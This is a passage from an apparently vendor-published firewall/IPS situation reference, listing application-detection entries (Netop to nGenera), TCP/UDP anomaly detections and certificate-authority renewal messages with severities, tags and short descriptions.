Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neto E-commerce provides ecommerce software solutions and shopping cart software for online businesses.
Back to top

Netop

About this situation: Application Netop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Netop provides software solutions that connect people with computers and smart devices, using remote access, screen-sharing and video chat technologies.
Back to top

Netop-OnDemand

About this situation: Netop OnDemand usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-1638-5242
Description: Netop OnDemand provides a web-based help desk service.
Back to top

Netop-Remote-Control

About this situation: Netop Remote Control usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control
First detected in: sgpkg-ips-527-5211
Last changed: sgpkg-ips-628-5211
Description: Netop Remote Control is a remote control solution for remote administration and maintenance for professional users.
Back to top

Netregistry

About this situation: Application Netregistry detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Netregistry provides a domain names and web hosting for a success business. Plus all the extras need including websites, SEO and email marketing.
Back to top

NetSimplicity-Meeting-Room

About this situation: Application NetSimplicity-Meeting-Room detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Asure Software, Inc.
Back to top

Netskope

About this situation: Application Netskope detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Netskope is a cloud access security broker, helps enterprises find and secure sanctioned and unsanctioned cloud apps.
Back to top

Netsoltech

About this situation: Application Netsoltech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetSol Technologies Inc. is a provider of global IT and enterprise application solutions which include credit and finance portfolio management systems, SAP consulting, custom development, systems integration and technical services.
Back to top

Netsuite

About this situation: NetSuite usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1769-5242
Description: This application is a Software-as-a-Service (SaaS) that supports organizational activites such as accounting and enterprise resource planning (ERP), customer relationship management, and web capabilities Source: NetSuite.com
Back to top

Nettica-DNS

About this situation: Application Nettica-DNS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nettica is a global provider of DNS services, domain registration, and email services for customers hosting their own sites.
Back to top

netTrekker

About this situation: Application netTrekker detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: netTrekker delivers the industry-leading digital learning resource library with more than 360,000 educator-curated resources - each one tagged, organized, and aligned to state and Common Core standards so that teachers, students, and parents can find just what they need, quickly and safely.
Back to top

NetVibes

About this situation: Application NetVibes detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NetVibes provides a platform that enables people to personalize and publish their daily digital lives.
Back to top

NetWare-Core-Protocol

About this situation: NetWare Core Procotol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-759-5211
Description: NCP is utilized by Novell eDirectory (a Lightweight Directory Access Protocol) server for network communication. NCP manages access requirement to the primary NetWare server resources such as the file system and the printing system as well as login requests.
Back to top

Network Errors

About this situation: URLs with hosts that do not resolve to IP addresses.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: URLs with hosts that do not resolve to IP addresses.
Back to top

Network-for-Good

About this situation: Application Network-for-Good detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Network for Good powers more digital giving than any other platform. Provide nonprofits, corporations, and software developers with simple solutions to power the good they do with supporters, employees, and consumers.
Back to top

Network-Solutions

About this situation: Network Solutions usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Network Solutions provides domain name registration and manages more than 6.6 million domain names.
Back to top

Networkfleet

About this situation: Application Networkfleet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Verizon Networkfleet is a provider of wireless fleet management services that improve fleet operations by decreasing fuel use, optimizing vehicle utilization, decreasing maintenance costs with vehicle diagnostics, and improving driver management.
Back to top

Networx

About this situation: Application Networx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Networx allows approach to recruitment and support clients in a highly tailored manner and reflect needs. It offers an portfolio of products and services, which can be used to support the needs of business.
Back to top

NET_ICMP_BADLEN

About this situation: ICMP message has a bad length
Context: SSM Context
Severity: 2
Tags: SSM Anomalies, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The amount of data received for an ICMP packet did not match the advertised length in the IP header.
Back to top

NET_TCP_BADACKFORSYN

About this situation: TCP bad ACK for SYN
Context: SSM Context
Severity: 8
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: An ACK TCP packet was received that should have been in response to a SYN, but its sequence number was incorrect. This may be an attempt to disrupt TCP connections.
Back to top

NET_TCP_BADOFFSET

About this situation: TCP bad offset
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A TCP packet was received with a bad offset. This is an attempt to cause TCP to process bad data.
Back to top

NET_TCP_BADSYNRCVDACK

About this situation: TCP bad ACK; SYN RECEIVED state
Context: SSM Context
Severity: 8
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Dropped an ACK packet with an unexpected sequence number while in SYN RECEIVED state. This is a signature of the LAND DOS attack.
Back to top

NET_TCP_CONNREFUSED

About this situation: TCP connection refused
Context: SSM Context
Severity: 8
Tags: SSM Errors, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a RESET with ACK while it was trying to establish a connection. This indicates that the remote system refused the connection.
Back to top

NET_TCP_CONNREJECTED

About this situation: TCP connection rejected
Context: SSM Context
Severity: 8
Tags: SSM Errors, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a RESET while it was trying to establish a connection. This indicates that the remote system rejected the connection.
Back to top

NET_TCP_CONNRST

About this situation: TCP RESET during close
Context: SSM Context
Severity: 1
Tags: SSM Informative Messages, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a RESET while closing a connection.
Back to top

NET_TCP_DROPSYNFIN

About this situation: TCP dropped SYN/FIN
Context: SSM Context
Severity: 1
Tags: SSM Policy Violations, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Dropped a SYN connection request with a FIN also set and the net.inet.tcp.drop_synfin Advanced SSM Proxy Setting is set.
Back to top

NET_TCP_FORGEDSRC

About this situation: TCP forged source/dest
Context: SSM Context
Severity: 8
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Dropped a connection attempt in which the source and destination addresses and ports were identical to each other. This is a forged packet.
Back to top

NET_TCP_MALFORMEDPROBE

About this situation: TCP malformed netprobe
Context: SSM Context
Severity: 2
Tags: SSM Anomalies, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a TCP packet on a port with no listening service. The packet also did not have the SYN flag set. This may be a late packet for a recently reset connection or may be a scanning attack indication.
Back to top

NET_TCP_MSSOVERLOAD

About this situation: TCP MSS overload attack
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received too many small packets in the last second on this connection (defined by the net.inet.tcp.minmss and net.inet.tcp.minmssoverload Advanced SSM Proxy Setting). This may be a small packet DOS attack. Setting minmssoverload to 0 will disable this check, while setting minmssoverload higher than currently set will allow valid traffic to be received.
Back to top

NET_TCP_NONUNIDEST

About this situation: TCP broadcast/multicast dest
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Dropped a connection attempt destined to a broadcast or multicast destination.
Back to top

NET_TCP_NOSYN

About this situation: TCP no SYN;SYN_SENT
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a packet without a SYN while it was trying to establish a connection and a SYN was expected.
Back to top

NET_TCP_OLDDUP

About this situation: TCP old duplicate
Context: SSM Context
Severity: 2
Tags: SSM Anomalies, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a packet that contains a timestamp from before this connection was established. It may be an old duplicate packet from a previous connection, or it may indicate a timestamp attack.
Back to top

NET_TCP_PERSIST_DROP

About this situation: TCP persist drop
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A slow reading client did not accept all available data within the timeout period following a connection close. This is probably a resource starvation attack.
Back to top

NET_TCP_REASS_MAXSEG

About this situation: TCP max segments;reassembly
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: There are too many out of order segments in TCP reassembly processing.
Back to top

NET_TCP_RSTNODATA

About this situation: TCP RESET; no data xfer
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a RESET after the remote system connected, but no data was transferred. This could indicate a stealth connection attack.
Back to top

NET_TCP_RSTSEQ

About this situation: TCP RESET sequence error
Context: SSM Context
Severity: 8
Tags: SSM Errors, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a RESET packet with an invalid sequence number. This may be a reset for an earlier connection, or it may indicate an attack.
Back to top

NET_TCP_SRCPORT0

About this situation: TCP zero source port
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a TCP connection attempt with a zero source port.
Back to top

NET_TCP_SYNACKPROBE

About this situation: TCP SYN/ACK netprobe
Context: SSM Context
Severity: 2
Tags: SSM Anomalies, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a SYN/ACK packet that did not match a pending outgoing connection. This may indicate a scanning attack or routing problem.
Back to top

NET_TCP_SYNDROPPED

About this situation: TCP SYN dropped
Context: SSM Context
Severity: 8
Tags: SSM Errors, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Unable to respond to a connection attempt. This may be due to an out of memory condition, loss of routing to the remote, or some other condition preventing output.
Back to top

NET_TCP_SYNRST

About this situation: TCP RESET after SYN
Context: SSM Context
Severity: 8
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a RESET after the remote system initiated a connection attempt. This could indicate a stealth connection attack. It also could indicate an aborted connection from the remote.
Back to top

NET_TCP_SYNUNREACH

About this situation: TCP SYN/ACK unreachable
Context: SSM Context
Severity: 2
Tags: SSM Anomalies, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The system was accepting a connection but received an ICMP unreachable message in response to the SYN/ACK.
Back to top

NET_TCP_UNSPECSRC

About this situation: TCP unpecified V6 src
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A TCP packet was received with an unspecified IPv6 source address. This is an attempt to cause the system to generate bad packets in response.
Back to top

NET_TCP_V4MAP

About this situation: TCP V4mapped addr
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A TCP packet was received with an IPv6 source or destination address that is an IPv4 Mapped address. The system does not support direct IPv6 to IPv4 data transfer.
Back to top

NET_TCP_WIN0FIN_NODATA

About this situation: TCP zero-window close; no data
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A connection with a zero-byte window was closed before the peer had acknowledged any data. This is probably a resource starvation attack.
Back to top

NET_UDP_BADLEN

About this situation: Bad UDP length
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The amount of data received for this UDP packet did not match the advertised length in the IP header.
Back to top

NET_UDP_DSTPORT0

About this situation: UDP zero destination port
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Dropped a UDP packet with a destination port of zero.
Back to top

NET_UDP_FULLSOCKET

About this situation: UDP socket full
Context: SSM Context
Severity: 8
Tags: SSM Errors, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A UDP packet could not be delivered to the application because the socket was full. This usually means that data is arriving faster than the application can handle it.
Back to top

NET_UDP_NOSUM

About this situation: UDP zero checksum
Context: SSM Context
Severity: 1
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A UDP packet was received over IPv4 with no checksum and the net.inet.udp.checksum is set, requiring valid checksums.
Back to top

NET_UDP_SRCPORT0

About this situation: UDP zero source port
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Received a UDP packet with a zero source port.
Back to top

NET_UDP_V4MAP

About this situation: UDP V4mapped addr
Context: SSM Context
Severity: 5
Tags: SSM Attacks, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: A UDP packet was received with an IPv6 source or destination address that is an IPv4 Mapped address. The system does not support direct IPv6 to IPv4 data transfer.
Back to top

Neudesic

About this situation: Application Neudesic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neudesic provide technology, services and software products to help organizations gain a competitive advantage.
Back to top

Neupart

About this situation: Application Neupart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neupart provides an information security management system allowing organisations to automate IT governance, risk and compliance management.
Back to top

Neusoft

About this situation: Application Neusoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Neusoft is the IT solutions and services provider in China and was established at Northeastern University.Offer's a rich portfolio of Products and Solutions, including Industry Solutions, Product Engineering Solutions, related Software Products
Back to top

Neustar

About this situation: Application Neustar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1714-5242
Description: Neustar's IP Intelligence solutions will help you fight online fraud, mitigate compliance risk for online sales and gambling and enforce digital media rights.
Back to top

New CA could not be sent to component

About this situation: New CA could not be sent to component
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: Certificate Authority renewal: the new CA could not be sent to a component. Check that the component is reachable from the SMC.
Back to top

New CA could not be sent to component: component upgrade is required

About this situation: New CA could not be sent to component: component upgrade is required
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: Certificate Authority renewal: the new CA could not be sent to a component. Upgrade the component to version 5.1 or higher.
Back to top

New CA is not used by component

About this situation: New CA is not used by component
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: Certificate Authority renewal: a component has received the new CA, but the component does not use the new CA. Restart the component.
Back to top

New CA is ready to use

About this situation: New CA is ready to use
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-485-5211
Last changed: sgpkg-ips-485-5211
Description: Certificate Authority renewal: the new Internal Certificate Authority is ready to use. New Management Server certificates will be signed by the new Internal Certificate Authority. Certificates for other components will be signed by the current Internal Certificate Authority.
Back to top

New Certificate Authority is activated and old Certificate Authority becomes inactive

About this situation: New Certificate Authority is activated and old Certificate Authority becomes inactive
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: Certificate Authority renewal: new Certificate Authority becomes the only active Certificate Authority. Old Certificate Authority becomes inactive.
Back to top

New VPN CA is used: External Gateway does not trust new VPN CA

About this situation: New VPN CA is used: External Gateway does not trust new VPN CA
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN Certificate Authority renewal: new VPN Certificate Authority is used. External Gateway that trusts VPN Certificate Authority 'Internal IPsec CA' does not trust the new VPN Certificate Authority. Import the new VPN Certificate Authority to the External Gateway and set the External Gateway to trust the new VPN Certificate Authority.
Back to top

New VPN CA is used: External Gateway that trusts all VPN Certificate Authorities does not trust the new VPN CA

About this situation: New VPN CA is used: External Gateway that trusts all VPN Certificate Authorities does not trust new VPN CA
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN Certificate Authority renewal: new VPN Certificate Authority is used. External Gateway that trusts all defined VPN Certificate Authorities does not trust the new VPN Certificate Authority. Import the new VPN Certificate Authority to the External Gateway and set the External Gateway to trust the new VPN Certificate Authority.
Back to top

New VPN CA is used: refresh policy for Internal Gateway to trust new VPN CA

About this situation: New VPN CA is used: refresh policy for Internal Gateway to trust new VPN CA
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN Certificate Authority renewal: new VPN Certificate Authority is used. Refresh the policy on Firewall that is used as an Internal Gateway that trusts VPN Certificate Authority 'Internal IPsec CA', so that the Internal Gateway receives the new VPN Certificate Authority information.
Back to top

New-Brand-Analytics

About this situation: Application New-Brand-Analytics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: New Brand Analytics - social media monitoring and online reputation management tool that transforms online reviews into operational social intelligence.
Back to top

New-Innovations

About this situation: Application New-Innovations detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: New Innovations help medical personnel with the task of managing their training programs.
Back to top

New-Relic

About this situation: New Relic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: New Relic: The dashboard to keep an eye on application health and availability. Real user monitoring, server utilization, code-level diagnostics, and more.
Back to top

New-World-Telecom

About this situation: Application New-World-Telecom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: New World Telecom is a telecom service provider that offers international voice and data services for customers.
Back to top

Newegg

About this situation: Application Newegg detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Newegg is an online retailer of computer hardware and software.
Back to top

Newegg-Business

About this situation: Application Newegg-Business detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NeweggBusiness is an online shop for business IT products, small business solutions, office technology, office equipment, and office supplies.
Back to top

Newgensoft

About this situation: Application Newgensoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Newgen Software Inc. is a provider of Business Process Management
Back to top

Newly Registered Websites

About this situation: Sites whose domain name was registered recently.
Context: URL Application Context
Severity: 1
Tags: Extended Protection, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites whose domain name was registered recently.
Back to top

News and Media

About this situation: Sites that offer current news and opinion, including those sponsored by newspapers, general-circulation magazines or other media.
Context: URL Application Context
Severity: 1
Tags: News and Media, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer current news and opinion, including those sponsored by newspapers, general-circulation magazines or other media.
Back to top

Newsblur

About this situation: Newsblur usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: Newsblur is a web-based RSS/Atom-feed reader.
Back to top

Newscale

About this situation: Application Newscale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: newScale is the provider of self-service, service catalog, and lifecycle management software for enterprise IT and private
Back to top

Newton-Software

About this situation: Application Newton-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Newton recruiting software is a complete applicant tracking system designed to boost recruiting productivity. Try our web-based hiring software today.
Back to top

NewVoiceMedia

About this situation: Application NewVoiceMedia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NewVoiceMedia is a cloud contact centre and inside sales platform designed specifically for Salesforce.
Back to top

nexenta

About this situation: Application nexenta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nexenta provides software-defined storage, delivering, secure and storage software solutions. Its solutions are hardware-, protocol-, and app-agnostic, providing of Software-Defined Infrastructure-centric Cloud Computing.
Back to top

Nexmo

About this situation: Application Nexmo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nexmo provides communication APIs that bridge traditional voice and messaging services with cloud communications, enables applications and enterprises to connect to their customers via voice and SMS with ease no matter where in the world customers are located.
Back to top

Nexonia

About this situation: Nexonia usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: With Nexonia Timesheets You will be able track billable hours by project or customer, log vacation time off and sick days, and calculate time for payroll. Our cloud based application and mobile time tracking apps for iOS, Android, and Blackberry 10 will help your organization manage project time, saving you time and money.With Nexonia Expenses, you will streamline your employee expense reporting process. With features like flexible approvals, customization to your corporate travel expense policy, and ERP integration, you will save time and money when managing expenses and speed up expense reimbursement for employees.
Back to top

Nexopia

About this situation: Application Nexopia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nexopia.com is an online lifestyle magazine and social community with forums for Canadian young adults.
Back to top

NexorONE

About this situation: Application NexorONE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NexorONE is the online banking software solution for financial sectors.
Back to top

Nexpart

About this situation: Application Nexpart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WHI Solutions is software companies, provide web based eBusiness solutions to the Transportation Market. Nexpart from WHI Solutions has accelerated Internet parts ordering. Nexpart allows service dealers, car dealerships, fleets, national accounts, government agencies and distributors to order quickly and easily over the Internet from their parts suppliers.
Back to top

Nexpart-eCommerce

About this situation: Application Nexpart-eCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nexpart is an ecommerce solution designed to allow your customers to buy from you quickly and securely, 24 hours a day.
Back to top

Nextag

About this situation: Nextag usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Nextag is a price comparison service website where buyers and sellers can negotiate prices for computers and other electronics products.
Back to top

NextDocs

About this situation: Application NextDocs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NextDocs enables businesses in regulated industries to comply with FDA and regulatory agencies, and ever-evolving standards, while at the same time automating processes
Back to top

Nextiva

About this situation: Application Nextiva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nextiva is provider of unified cloud-based business communications, offers a simple approach to office telephony that is altering the economics of the small business telephone market.
Back to top

Nextiva-Fax

About this situation: Application Nextiva-Fax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nextiva Fax company offers office telephony services to the small and medium-size companies serving in the United States and Canada. Nextiva business phone systems focus on VoIP services. In addition, the company provides virtual fax lines and PBX trunk lines for SIP Trunking.
Back to top

Nextpoint

About this situation: Application Nextpoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nextpoint's cloud-based litigation support software provides complete litigation support services, including social media archiving, eDiscovery
Back to top

NextProof

About this situation: Application NextProof detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NextProof is an online proofing and sales platform for professional photographers. NextProof allows you to quickly and easily create galleries, send them to your wedding, event, or portrait clients, and process print sale transactions.
Back to top

NextStep-D.C.

About this situation: Application NextStep-D.C. detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Next Step Public Charter School is a bilingual GED and ESL program for immigrant and other 'at-risk' youth who have not succeeded in traditional high schools. The mission of The Next Step
Back to top

NEXUS-AG

About this situation: Application NEXUS-AG detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: NEXUS AG is healthcare software companies in Europe.NEXUS AG supply hospitals, rehabilitation institutions and senior citizen homes with IT applications. NEXUS AG are specialized in software solutions, which make work substantially easier for users in obtaining information and in medical documentation.
Back to top

NFS

About this situation: NFS traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1409-5242
Description: Network File System (NFS) usage. NFS is a file transfer protcol defined in RFC 1094, RFC 1813 and RFC 3530, among others. This network application identifies NFS and MOUNT traffic. For proper NFS functionality in the Forcepoint NGFW, use the SunRPC based NFS service elements in the access rules instead.
Back to top

NFSv3

About this situation: NFS version 3 traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1409-5242
Description: Network File System (NFS) usage. NFS is a file transfer protcol defined in RFC 1094, RFC 1813 and RFC 3530, among others.
Back to top

NFSv4

About this situation: NFS version 4 traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing, Application Routing
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1409-5242
Description: Network File System (NFS) usage. NFS is a file transfer protcol defined in RFC 1094, RFC 1813 and RFC 3530, among others.
Back to top

nGenera

About this situation: Application nGenera detected
